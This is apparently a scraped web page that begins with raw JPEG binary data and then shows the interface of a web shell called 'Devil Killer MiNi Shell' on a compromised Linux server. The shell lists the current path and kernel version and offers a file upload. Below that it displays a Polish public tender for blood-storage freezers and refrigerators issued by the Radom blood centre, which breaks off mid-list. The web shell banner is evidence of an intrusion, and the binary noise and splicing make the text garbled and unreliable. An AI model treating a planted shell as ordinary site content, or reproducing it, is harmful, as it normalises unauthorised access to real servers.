JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20220307/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20220307/0007731601-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> Urządzenia chłodnicze do przechowywania składników krwi . </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">REGIONALNE CENTRUM KRWIODAWSTWA I KRWIOLECZNICTWA IM. DR KONRADA VIETHA W RADOMIU</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 000303060</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">LIMANOWSKIEGO 42</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Radom</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">26-600</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">mazowieckie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL921 - Radomski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">48 3621127</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">przetargi@rckik.radom.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.rckik.radom.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - inny zamawiający</span> </h3> <p class="mb-0"> SPZOZ </p> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Zdrowie</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Urządzenia chłodnicze do przechowywania składników krwi . </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-1e23ebdb-9dfd-11ec-80f8-1ad70aec7fa4</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00077316</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-03-07</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00045466/01/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.2.1 Zakup sprzętu medycznego- zamrażarki</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://rckik-radom.ezamawiajacy.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://rckik-radom.ezamawiajacy.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Zamawiający określa dopuszczalny format kwalifikowanego podpisu elektronicznego, jako: dokumenty w formacie „pdf&#34; zaleca się podpisywać formatem PAdES, dopuszcza się podpisanie dokumentów w formacie innym niż „pdf&#34;, wtedy będzie wymagany oddzielny plik z podpisem. W związku z tym Wykonawca będzie zobowiązany załączyć oddzielny plik z podpisem. Zamawiający określa niezbędne wymagania sprzętowo- aplikacyjne umożliwiające pracę na Platformie Zakupowej tj.: stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 512 kb/s; komputer klasy PC lub MAC, o następującej konfiguracji: pamięć min 2GB Ram, procesor Intel IV 2GHZ, jeden z systemów operacyjnych - MS Windows 7 , Mac Os x 10.4, Linux, lub ich nowsze wersje; zainstalowana dowolna przeglądarka internetowa obsługująca TLS 1.2, najlepiej w najnowszej wersji w przypadku Internet Explorer minimalnie wersja 10.0; włączona obsługa JavaScript; zainstalowany program Acrobat Reader lub inny obsługujący pliki w formacie .pdf.Zamawiający określa dopuszczalne formaty przesyłanych danych tj. plików o wielkości do 100 MB w formatach: pdf., excel., doc., zip.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">abi@rckik.radom.pl</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP-1/2022</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">2</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Pakiet nr 1: Zamrażarka niskotemperaturowa do przechowywania mrożonych składników krwi w temperaturze -800C i niższej. – 1 sztuka<br/>1.	Zamrażarka pionowa - szafowa, przeznaczona do przechowywania mrożonych składników krwi w temperaturze -800C i niższej. <br/>2.	Dostawca zobowiązuje się do dostarczenia nowego urządzenia Urządzenie nowe, rok produkcji nie starsze niż 2021 rok.<br/>3.	Pojemność zamrażarki: 550 ± 10 l.<br/>4.	Waga maksymalna 250 kg.<br/>5.	Wymiary zewnętrzne (wysokość x głębokość x szerokość) 1980 x 960 x 720 mm ± 10 mm dla każdego z wymiarów. Podano maksymalne wartości.<br/>6.	Wymiary wewnętrzne (wysokość x głębokość x szerokość) 1300 x 690 x 590 mm ± 10 mm dla każdego z wymiarów<br/>7. Podstawa zamrażarki poziomowana powinna być wyposażona w kółka, ułatwiające przemieszczanie. Kółka powinny mieć blokadę.<br/>8.	Zamrażarka powinna być wyposażona w zamknięty kaskadowy system chłodzenia. Kaskadowy układ kompresorowy – pierwszy i drugi stopień. Kompresory o zmiennej prędkości pracy, pozwalającej na dostosowanie wydajności chłodzenia w zależności od warunków wewnątrz i na zewnątrz zamrażarki (np. w przypadku otwarcia drzwi większa prędkość pozwalająca na szybszy powrót do temperatury pracy).<br/>9.	Zabezpieczenie układu kompresorowego przed przepięciem oraz zbyt wysoką temperaturą (programowalne).<br/>10.	Układ chłodzenia zawierający ekologiczne czynniki chłodnicze o współczynniku GWP mniejszym niż 2500.<br/>11.	Urządzenie powinno posiadać jedne drzwi zewnętrzne oraz dwoje drzwi wewnętrznych. Urządzenie powinno być wyposażone w trzy półki ze stali nierdzewnej, z regulacją wysokości zamocowania. Łatwy dostęp do każdej półki. Obciążenie półki maksymalnie do 70 kg.<br/>12.	Uszczelka silikonowa drzwi zewnętrznych, podgrzewana grzałką elektryczną.<br/>13.	Gwarantowany zakres pracy minimum: od -500C do -860C przy temperaturze pomieszczenia od 18 do 25 0C. Utrzymywanie temperatury poniżej -50 °C w przypadku awarii zasilania przy zamkniętych drzwiach dla temperatury pracy -80°C co najmniej przez 260 min.<br/>14.	Na zewnątrz wykonane ze stali malowanej, łatwej do utrzymania w czystości.<br/>15.	Komora zamrażarki powinna być wykonana ze stali nierdzewnej. Wytrzymała, walcowana na zimno, stalowa konstrukcja zewnętrzna, powinna być odporna na odpryski i rdzę. Urządzenie powinno być wykonane z materiałów, umożliwiających łatwe czyszczenie i dezynfekcje.<br/>16. Poziom hałasu &lt; 50dBA.<br/>17.	Zasilanie 230 V, 50Hz, 1 faza.<br/>18.	Zużycie energii elektrycznej maksymalnie 8 kWh (dla nastawy temperatury -80°C) dla podstawowego trybu pracy zamrażarki.<br/>19.	Wyposażona w próżniowe panele izolacyjne z nadmuchiwaną wodą pianką poliuretanową o wysokiej gęstości.<br/>20.	System uszczelek powinien przeciwdziałać narastaniu lodu w czasie użytkowania.<br/>21.	Możliwość zainstalowania systemu awaryjnego CO2 lub LN2.<br/>22.	Zasilanie awaryjne panelu sterowania.<br/>23.	Zamrażarka powinna posiadać monitoring temperatury. Zamrażarka powinna być także wyposażona w system alarmowy: alarm zbyt wysokiej i niskiej temperatury, alarm braku zasilania, alarm zbyt wysokiej temperatury otoczenia. <br/>24.	Urządzenie wyposażone w dotykowy panel sterowania (będący jednocześnie wyświetlaczem) zamontowany na wysokości oczu operatora. Funkcje panelu:<br/>	możliwość zgrania danych dotyczących pracy urządzenia na pendrive poprzez port USB,<br/>	wyświetlanie aktualnej daty i godziny oraz aktualnej temperatury w komorze,<br/>	wyświetlanie aktualnego stanu zamrażarki (normalna praca, powiadomienie o komunikacie, stan alarmowy aktywny i wyciszony),<br/>	programowanie alarmu zbyt wysokiej i zbyt niskiej temperatury w komorze oraz zbyt wysokiej temperatury otoczenia,<br/>	alarmy wizualne i dźwiękowe z funkcją wyciszenia (programowalny czas wyciszenia),<br/>	możliwość zaprogramowania temperatury dla załączenia systemu awaryjnego,<br/>	możliwość wyboru trybu pracy urządzenia – standardowy (oszczędzanie energii) oraz wysokiej wydajności,<br/>	możliwość wprowadzenia blokady zmiany parametrów pracy urządzenia – programowanie użytkowników z określonym poziomem dostępu,<br/>	możliwość nastawy jasności wyświetlacza oraz jego czasu aktywności,<br/>	możliwość kalibracji wskazania czujnika temperatury w komorze,<br/>	podgląd stanów alarmowych oraz zdarzeń takich jak np. otwarcie drzwi zamrażarki, zanik zasilania, alarm temperatury,<br/>	podgląd wykresu temperatury,<br/>	możliwość wyświetlenia aktualnej wartości zasilania sieciowego oraz aktualnej wartości zasilania awaryjnego (akumulatorowego),<br/>	funkcja zliczania otwarć drzwi oraz czasu od ostatniego otwarcia.<br/>25.	Panel sterowania powinien posiadać zasilanie awaryjne.<br/>26.	System monitorowania, zasilania z zabezpieczeniem przepięciowym i automatycznym regulatorem napięcia.<br/>27.	Urządzenie musi posiadać znak CE i spełniać wymogi GMP.<br/>28.	Dostawca zapewnia bezpłatny transport urządzenia do miejsca wskazanego przez Zamawiającego.<br/>29.	Instrukcja obsługi w języku polskim.<br/>30.	Dostawca zapewnia autoryzowany serwis na terenie Polski.<br/>31.	Czas naprawy do 48 godzin od momentu zgłoszenia awarii. Zgłoszenie może odbyć się telefonicznie lub mailowo (zgodnie z danymi kontaktowymi podanymi w umowie na sprzedaż urządzenia).<br/>32. Dostawca zapewnia minimum 24 miesięczną gwarancję na urządzenie od daty instalacji.<br/>33.	W okresie gwarancji dostawca zobowiązuje się do minimum 2 bezpłatnych przeglądów gwarancyjnych w okresach wskazanych przez zamawiającego.<br/>	Wymagania dotyczące serwisu:<br/>34.	Serwis zlokalizowany na terenie Polski.<br/>35.	Serwis posiadający urządzenia (z aktualnymi świadectwami wzorcowania nie starszymi niż 1 rok) umożliwiające naprawy oraz coroczne przeglądy serwisowe z walidacją zamrażarki.<br/>36.	Wykonawca zapewni serwis z uprawnieniami wymaganymi przepisami Ustawy z dnia z dnia 12 lipca 2017r. o zmianie ustawy o substancjach zubożających warstwę ozonową oraz o niektórych fluorowanych gazach cieplarnianych oraz niektórych innych ustaw (Dz.U.2016 poz. 1567).<br/> Wykaz dokumentów<br/>Zaświadczenie uprawniające dla pracowników wykonujących czynności serwisowe dla urządzeń chłodniczych z substancją kontrolowaną. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">42513000-5 - Urządzenia chłodnicze i mrożące</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">3 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">20.1.1	Cena oferty brutto - 60 %<br/><br/>Punkty w niniejszym kryterium zostaną przyznane wg następującego wzoru:<br/><br/>Najniższa oferowana cena brutto spośród ofert nie podlegającej odrzuceniu<br/> -------------------------------------------------------- x 60<br/> Cena brutto oferty badanej<br/><br/><br/><br/>20.1.2	Kryterium jakość - 40 %<br/><br/>Punkty w niniejszym kryterium zostaną przyznane wg następującej punktacji<br/> Suma punktów dla danej oceny zostanie podstawiona do poniższego wzoru<br/>Parametry jakościowe = Suma punktów oferty badanej <br/>Maksymalna liczba punktów 40</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin dostawy</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Pakiet nr 2<br/>A.	Zamrażarka skrzyniowa przeznaczona do przechowywania osocza świeżo mrożonego w temperaturze poniżej -250C - 6 sztuk.<br/><br/>Wymagania dla zamrażarek poniżej -250C<br/>1.	Zamrażarka skrzyniowa, przeznaczona do przechowywania osocza świeżo mrożonego (FFP), wyposażona w cztery nóżki oraz dodatkowe cztery kółka.<br/>2.	Dostawca dostarczy urządzenie nowe – rok produkcji 2021/2022.<br/>3.	Pojemność urządzenia: 385 litrów±10%.<br/>4.	Maksymalne wymiary zamrażarki(zewnętrzne):1560mmX600mmX880mm±10mm.(szerokość X głębokość X wysokość) dla każdego z wymiarów.<br/>5.	Waga pustego urządzenia maksymalnie 85 kg.<br/>6.	Zamrażarka powinna być wyposażona w uchwyt drzwi i klamkę, na części frontowej pokrywy. Drzwiczki pokrywy powinny być wyposażone w zintegrowany z uchwytem zamek, zamykany na kluczyk.<br/>7.	Wewnętrzna część urządzenia (powierzchnia ścian komory chłodniczej) powinna być wykonana ze stali malowanej, pozwalającej na łatwe czyszczenie i dezynfekcję.<br/>8.	Zewnętrzna bryłą urządzenia wykonana ze stali malowanej, umożliwiające łatwą dezynfekcję i czyszczenie zamrażarki.<br/>9.	Urządzenie powinno posiadać port dostępu do wnętrza, celem wprowadzenia dodatkowych czujników – rejestratory temperatury.<br/>10.	Poziom hałasu – maksymalnie 55 dBA.<br/>11.	Stabilność temperaturowa pracy gwarantowana do temperatury maksymalnej otoczenia tj. 30oC.<br/>12.	Gwarantowany zakres temperaturowy pracy urządzenia to -250C do -450C.<br/>13.	Grubość izolacji cieplnej zamrażarki, minimum 80 mm.<br/>14.	Zamrażarka powinna być wyposażona w klasyczną izolację cieplną, wykonaną z pianki poliuretanowej z cyklopentanem.<br/>15.	Zamrażarka powinna zapewnić niskie zużycie energii, maksymalnie 4,5kWh/24h, przy nastawieniu temperatury pracy -300C.<br/>16.	Urządzenie powinno zapewniać jednorodność temperatury wewnętrznej na poziomie nie gorszej niż 3,50C.<br/>17.	Zamrażarka powinna być wyposażona w prosty sterownik z wyświetlaczem LED, umieszczony w dolnej przedniej części komory chłodniczej.<br/>18.	Zamrażarka powinna być wyposażona w system alarmowania: niskiej i wysokiej temperatury (regulowane ustawienie); uszkodzenia lub błędu sondy temperatury.<br/>19.	Zamrażarka powinna być wyposażona w układ chłodniczy jednokompresorowy.<br/>20.	Zasilanie: 230V/50Hz.<br/>21.	Dostawca zapewni gwarancję na urządzenie na okres minimum 24 miesięcy.<br/>22.	Dostawca zapewnia bezpłatny transport urządzenia do miejsca wskazanego przez Zamawiającego.<br/>23.	Dostawca zapewnia autoryzowany serwis na terenie Polski. Serwisanci powinni posiadać odpowiednie kwalifikacje do przeprowadzania czynności serwisowych – potwierdzone stosownymi zaświadczeniami.<br/>24.	Czas naprawy do 48 godzin od momentu zgłoszenia awarii. Zgłoszenie może odbyć się telefonicznie lub mailowo (zgodnie z danymi kontaktowymi podanymi w umowie na sprzedaż urządzenia).<br/>25. Dostawca zapewnia minimum 24 miesięczną gwarancję na urządzenie od daty instalacji.<br/>26.	Dostawca zapewni szkolenie personelu z zakresu obsługi urządzenia w języku polskim.<br/>27.	Czas dostawy urządzenia od daty podpisania umowy – maksymalnie 12 tygodni.<br/>28.	Wraz z dostarczonym urządzeniem Dostawca dostarczy odpowiednie dokumenty tj. Instrukcja obsługi w języku polskim, protokół zdawczo – odbiorczy, protokół szkolenia.<br/> <br/><br/>B.	Chłodnia medyczna przeznaczona do przechowywania krwi i jej składników w temperaturze 2-60C - 6 sztuk.<br/>Wymagania dla chłodni medycznych.<br/>1.	Chłodnia medyczna przeznaczona do przechowywania krwi i jej składników w temperaturze 2-60C, zgodna z Dyrektywa medyczną 93/42/EEC lub równoważną. <br/>2.	Pojemność urządzenia: 600 litrów±5l. Liczba worków możliwych do przechowywania to co najmniej : 260 sztuk po średnio 450 ml lub 450 szt. po średnio 250 ml.<br/>3.	Chłodnia o typie budowy szafkowym, pionowym, jednodrzwiowa. Urządzenie powinno być wyposażone w cztery kółka i minimum 2 stopki do wypoziomowania i stabilizacji. Część zewnętrzna powinna być wykonana ze stali galwanizowanej, ocynkowana z zabezpieczeniem antykorozyjnym.<br/>4.	Dostawca dostarczy urządzenie nowe – rok produkcji 2021/2022. <br/>5.	Maksymalne wymiary chłodni (zewnętrzne): 750 mm± 5mm X 820 mm± 5mm X 1995mm ± 5mm.(szerokość X głębokość X wysokość)<br/>6.	Waga pustego urządzenia maksymalnie 180 kg.<br/>7.	Chłodnia powinna być wyposażona w uchwyt drzwi i klamkę, na części frontowej drzwi ( nie na ścianie bocznej).<br/>8.	Wewnętrzna powierzchnia ścian komory chłodniczej powinna być wykonana ze stali nierdzewnej AISI 304 z zaokrąglonymi narożnikami. Materiał ten powinien pozwalać na łatwe czyszczenie i dezynfekcję.<br/>9.	Wnętrze chłodni powinno być wyposażone w 6 szuflad ze stali nierdzewnej. Szuflady wyposażone w ekran przedni z pleksiglasu dla zniwelowania dostępu ciepłego powietrza po otwarciu drzwi.<br/>10.	Komplet szuflad dla co najmniej 4 sztuk chłodni wyposażony we wkłady PVC dzielące je na partycje (komplet dla co najmniej 24 szuflad). <br/>11.	Zewnętrzna bryłą urządzenia wykonana z materiału, który zapewni łatwą dezynfekcję i czyszczenie chłodni.<br/>12.	Drzwi zewnętrzne chłodni powinny być przeszklone wyposażone w zamek magnetyczny i uszczelkę gumową. Przeszklone drzwi powinny być wykonane z trójwarstwowego szkła uszczelnionego próżniowo z zabezpieczeniem uniemożliwiającym skraplanie.<br/>13.	Urządzenie powinno posiadać port dostępu do wnętrza (średnica 23mm) z gumowa zaślepką, celem wprowadzenia dodatkowych czujników – rejestratory temperatury.<br/>14.	Poziom hałasu – maksymalnie 55 dBA.<br/>15.	Stabilność temperaturowa pracy gwarantowana do temperatury maksymalnej otoczenia tj. 32oC.<br/>16.	Gwarantowany zakres temperaturowy pracy urządzenia to 40C.<br/>17.	Rozdzielczość wyświetlania temperatury – potwierdzona wskazaniem wyświetlacza panelu sterowani: 0,10C.<br/>18.	Grubość izolacji cieplnej zamrażarki, minimum 75 mm.<br/>19.	Zamrażarka powinna być wyposażona w klasyczną izolację cieplną, wykonaną z pianki poliuretanowej.<br/>20.	Wewnętrzne oświetlenie LED chłodni powinno być uruchamiane automatycznie po otwarciu drzwi chłodni oraz możliwe do uruchomienia z panelu sterowania za pomocą dedykowanego przycisku.<br/>21.	Urządzenie powinno być wyposażone w panel kontrolno-sterujący wyposażony w wielofunkcyjny, dotykowy graficzny wyświetlacz LCD min. 7 cali z wewnętrznym protokołem CAN BUS.<br/>22.	Panel kontrolno –sterujący powinien mieć blokadę przed nieautoryzowanymi zmianami za pomocą haseł z co najmniej 3-ma poziomami dostępu. <br/>23.	Podstawowe wymagania dotyczące sterownika: informacja o aktualnych parametrach pracy oraz stanach alarmowych; automatyczne rejestracja oraz zapis rekordów temperatury w krokach co 30 sek. przez min. 10 lat. Zapis na nośniku zewnętrznym (wbudowane gniazdo USB); podgląd rekordów temperatury wnętrza chłodni z możliwością wyświetlania danych w formie wykresu; funkcja ECO - przejście w tryb obniżonego zużycia energii wraz z wygaszaniem ekranu w okresie rzadszego otwierania drzwi np. w nocy.<br/>24.	Urządzenie powinno mieć funkcję ciągłej autodiagnozy gwarantującej stałe monitorowanie stopnia zużycia głównych elementów. Po 